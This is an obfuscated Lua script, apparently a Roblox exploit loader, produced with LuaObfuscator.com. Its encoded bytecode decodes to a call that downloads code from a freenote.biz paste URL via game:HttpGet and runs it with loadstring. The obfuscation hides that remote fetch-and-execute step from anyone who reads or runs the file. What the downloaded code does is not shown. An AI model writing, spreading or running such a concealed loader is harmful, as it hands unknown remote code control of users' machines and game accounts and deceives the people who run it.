--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v103=v5(v83,v19);v19=nil;return v103;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-1) -(v32-((878 -(282 + 595)) -0))) + (2 -1))) ;return v84-(v84%(620 -(555 + 64))) ;else local v85=931 -((2494 -(1523 + 114)) + 74) ;local v86;while true do if (v85==((511 + 57) -(367 + 201))) then v86=2^(v32-(928 -(214 + 713))) ;return (((v31%(v86 + v86))>=v86) and ((1 -0) + 0)) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1065 -(68 + 997) ;local v36;local v37;while true do if (((2227 -(892 + 65)) -(226 + 1044))==v35) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (8 -6) ;v35=118 -(32 + 85) ;end if (v35==(1 + 0)) then return (v37 * (57 + 199)) + v36 ;end end end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (30800116 -14022900)) + (v41 * 65536) + (v40 * 256) + v39 ;end if (v38==(350 -(87 + 263))) then v39,v40,v41,v42=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 0 + 1 ;v38=2 -1 ;end end end local function v24() local v43=v23();local v44=v23();local v45=3 -2 ;local v46=(v20(v44,773 -(201 + 571) ,20) * ((954 -(802 + 150))^(85 -53))) + v43 ;local v47=v20(v44,(1175 -(116 + 1022)) -16 ,23 + 8 );local v48=((v20(v44,50 -(10 + 8) )==((12 -9) -2)) and  -((586 + 412) -(915 + 82))) or (2 -1) ;if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=(3 -2) -0 ;v45=1187 -(1069 + 118) ;end elseif (v47==(4643 -2596)) then return ((v46==(0 -0)) and (v48 * ((1487 -(998 + 488))/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((1 + 1)^(43 + 9)))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(860 -(814 + 45)) );v18=v18 + v49 ;local v51={};for v65=1 + 0 , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 1793 -(1563 + 230) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v52==(287 -(134 + 151))) then for v94= #"!",v23() do local v95=(function() return 0;end)();local v96=(function() return;end)();while true do if ((1665 -(970 + 695))==v95) then v96=(function() return v21();end)();if (v20(v96, #",", #"~")==(0 -0)) then local v109=(function() return 1990 -(582 + 1408) ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109==1) then local v151=(function() return 0;end)();local v152=(function() return;end)();while true do if (v151~=(0 -0)) then else v152=(function() return 0;end)();while true do if (v152~=(0 -0)) then else local v168=(function() return 0;end)();while true do if (v168==1) then v152=(function() return 1;end)();break;end if (v168==(0 -0)) then v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==(0 -0)) then local v169=(function() return 241 -(187 + 54) ;end)();local v170=(function() return;end)();while true do if (v169==0) then v170=(function() return 780 -(162 + 618) ;end)();while true do if (0==v170) then v112[ #"xnx"]=(function() return v22();end)();v112[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v110== #"~") then v112[ #"91("]=(function() return v23();end)();elseif (v110==(2 + 0)) then v112[ #"xxx"]=(function() return v23() -(2^16) ;end)();elseif (v110== #"91(") then local v175=(function() return 0 + 0 ;end)();local v176=(function() return;end)();while true do if (v175~=0) then else v176=(function() return 0 -0 ;end)();while true do if (v176~=(0 -0)) then else v112[ #"19("]=(function() return v23() -(2^16) ;end)();v112[ #"?id="]=(function() return v22();end)();break;end end break;end end end v168=(function() return 1 + 0 ;end)();end end end if (v152==(1637 -(1373 + 263))) then v109=(function() return 1002 -(451 + 549) ;end)();break;end end break;end end end if (v109~=3) then else if (v20(v111, #"xnx", #"19(")~= #"]") then else v112[ #"?id="]=(function() return v58[v112[ #"xnxx"]];end)();end v53[v94]=(function() return v112;end)();break;end if (v109==(1 + 1)) then if (v20(v111, #">", #"}")~= #"}") then else v112[2]=(function() return v58[v112[2]];end)();end if (v20(v111,2 -0 ,2 -0 )== #"{") then v112[ #"-19"]=(function() return v58[v112[ #"xxx"]];end)();end v109=(function() return 1387 -(746 + 638) ;end)();end if (0~=v109) then else local v154=(function() return 0 + 0 ;end)();while true do if (v154==(0 -0)) then v110=(function() return v20(v96,343 -(218 + 123) , #"-19");end)();v111=(function() return v20(v96, #".dev",1587 -(1535 + 46) );end)();v154=(function() return 1 + 0 ;end)();end if (v154~=(1 + 0)) then else v109=(function() return 561 -(306 + 254) ;end)();break;end end end end end break;end end end for v97= #"/",v23() do v54[v97-#"}" ]=(function() return v28();end)();end return v56;end if (v52==0) then local v90=(function() return 0;end)();local v91=(function() return;end)();while true do if (v90~=0) then else v91=(function() return 0 + 0 ;end)();while true do if (v91==0) then v53=(function() return {};end)();v54=(function() return {};end)();v91=(function() return 1;end)();end if (v91~=2) then else v52=(function() return  #"|";end)();break;end if ((1 -0)==v91) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v91=(function() return 1469 -(899 + 568) ;end)();end end break;end end end if ( #":"==v52) then local v92=(function() return 0;end)();local v93=(function() return;end)();while true do if (v92~=0) then else v93=(function() return 0 + 0 ;end)();while true do if ((4 -2)==v93) then v52=(function() return 605 -(268 + 335) ;end)();break;end if (v93==(290 -(60 + 230))) then v57=(function() return v23();end)();v58=(function() return {};end)();v93=(function() return 1;end)();end if (v93~=1) then else for v114= #" ",v57 do local v115=(function() return 0;end)();local v116=(function() return;end)();local v117=(function() return;end)();local v118=(function() return;end)();while true do if (v115==1) then v118=(function() return nil;end)();while true do if (v116~=0) then else local v166=(function() return 572 -(426 + 146) ;end)();while true do if (0==v166) then v117=(function() return v21();end)();v118=(function() return nil;end)();v166=(function() return 1;end)();end if (v166==(1 + 0)) then v116=(function() return 1;end)();break;end end end if (v116==(1457 -(282 + 1174))) then if (v117== #"|") then v118=(function() return v21()~=0 ;end)();elseif (v117==(813 -(569 + 242))) then v118=(function() return v24();end)();elseif (v117== #"xxx") then v118=(function() return v25();end)();end v58[v114]=(function() return v118;end)();break;end end break;end if (v115==0) then local v155=(function() return 0;end)();while true do if (v155==1) then v115=(function() return 1;end)();break;end if (v155==(0 -0)) then v116=(function() return 0 + 0 ;end)();v117=(function() return nil;end)();v155=(function() return 1;end)();end end end end end v56[ #"91("]=(function() return v21();end)();v93=(function() return 2;end)();end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[1025 -(706 + 318) ];local v63=v59[1253 -(721 + 530) ];local v64=v59[1 + 2 ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=414 -(15 + 398) ;local v72= -(1272 -(945 + 326));local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v87=700 -(271 + 323 + 106) ,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 + 0 ];else v77[v87]=v74[v87 + ((1244 + 257) -(1408 + 92)) ];end end local v78=(v75-v69) + (1087 -(461 + 625)) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1289 -(993 + 295) ];if ((3286<=4935) and (v80<=(1 + 5))) then if (v80<=((499 + 674) -(418 + 753))) then if ((788<=3423) and (v80<=(0 + 0))) then local v104=0 + (1504 -(363 + 1141)) ;local v105;local v106;while true do if (v104==(0 + 0)) then v105=v79[1 + 1 ];v106=v77[v79[1 + (1582 -(1183 + 397)) ]];v104=530 -(406 + 123) ;end if (v104==(1770 -(1749 + 20))) then v77[v105 + 1 + 0 ]=v106;v77[v105]=v106[v79[1326 -(1249 + 73) ]];break;end end elseif ((v80==(1 + 0)) or (4007<741)) then v77[v79[(3418 -2295) -(118 + 1003) ]]();else v77[v79[1147 -(466 + 679) ]]=v61[v79[6 -3 ]];end elseif (v80<=(381 -(142 + 235))) then if ((v80>(8 -5)) or (1155>2350)) then local v121=v79[1902 -(78 + 28 + 1794) ];local v122,v123=v70(v77[v121](v13(v77,v121 + 1 + 0 + 0 ,v79[3])));v72=(v123 + v121) -(1 + (1975 -(1913 + 62))) ;local v124=0 -0 ;for v145=v121,v72 do v124=v124 + (2 -1) ;v77[v145]=v122[v124];end else local v125=v79[5 -3 ];local v126,v127=v70(v77[v125](v13(v77,v125 + 1 + 0 ,v79[117 -(4 + 110) ])));v72=(v127 + v125) -(585 -(57 + 527)) ;local v128=1427 -(41 + 1386) ;for v148=v125,v72 do v128=v128 + (104 -(17 + 86)) ;v77[v148]=v126[v128];end end elseif (v80>(13 -8)) then v77[v79[(3 + 1) -2 ]]();else do return;end end elseif (v80<=(3 + 6)) then if (v80<=(5 + 2)) then v77[v79[3 -1 ]]=v79[8 -5 ];elseif ((4029<=4853) and (v80==8)) then local v129=v79[168 -(122 + 44) ];v77[v129]=v77[v129](v13(v77,v129 + (1 -0) ,v72));else v77[v79[6 -4 ]]=v61[v79[3 + 0 ]];end elseif ((v80<=(25 -14)) or (516>3434)) then if (v80==(1212 -((987 -614) + (2762 -(565 + 1368))))) then local v133=0 + 0 ;local v134;while true do if (((0 -0) -0)==v133) then v134=v79[(1728 -(1477 + 184)) -(30 + 35) ];v77[v134]=v77[v134](v13(v77,v134 + 1 + 0 ,v72));break;end end else do return;end end elseif (v80>(22 -10)) then v77[v79[1259 -((1420 -377) + 214) ]]=v79[1 + 2 ];else local v137=0;local v138;local v139;while true do if ((4046>=3033) and (v137==(3 -2))) then v77[v138 + 1 ]=v139;v77[v138]=v139[v79[1216 -(323 + 829 + 60) ]];break;end if ((0 -0)==v137) then v138=v79[2];v139=v77[v79[583 -(361 + 219) ]];v137=337 -(144 + 192) ;end end end v71=v71 + (321 -(53 + 267)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403233O00682O7470733A2O2F66722O656E6F74652E62697A2F7261772F2O6738686B616E30323300083O0012093O00013O001209000100023O00200C000100010003001207000300044O0004000100034O000A5O00022O00063O000100012O00053O00017O00",v9(),...);
